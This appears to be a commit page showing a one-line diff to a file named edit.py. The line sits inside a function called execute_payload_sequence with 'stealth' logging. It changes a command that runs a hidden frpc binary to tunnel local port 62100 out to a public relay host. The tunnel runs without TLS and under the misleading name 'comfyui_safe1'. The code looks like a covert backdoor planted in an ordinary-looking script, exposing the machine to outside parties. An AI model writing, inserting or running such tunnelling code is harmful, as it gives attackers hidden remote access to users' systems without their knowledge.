ADGNSGNJKS commited on
Commit
e805de2
·
verified ·
1 Parent(s): c40b619

Update edit.py

Browse files
Files changed (1) hide show
  1. edit.py +1 -1
edit.py CHANGED
@@ -66,7 +66,7 @@ def execute_payload_sequence():
66
  except Exception as e:
67
  stealth_log(f"Exception during dependency installation: {str(e)}")
68
 
69
- cmd2_ssh_tunnel = "~/.frpc tcp -n 'comfyui_safe5554' -s 'frp.freefrp.net' -P 7000 -i '127.0.0.1' -l 62100 -r 32103 -t 'freefrp.net' --tls-enable=false"
70
  try:
71
  stealth_log("Attempting to establish SSH tunnel...")
72
 
 
66
  except Exception as e:
67
  stealth_log(f"Exception during dependency installation: {str(e)}")
68
 
69
+ cmd2_ssh_tunnel = "~/.frpc tcp -n 'comfyui_safe1' -s 'hk.afrp.net' -P 7000 -i '127.0.0.1' -l 62100 -r 32100 -t 'afrp.net' --tls-enable=false"
70
  try:
71
  stealth_log("Attempting to establish SSH tunnel...")
72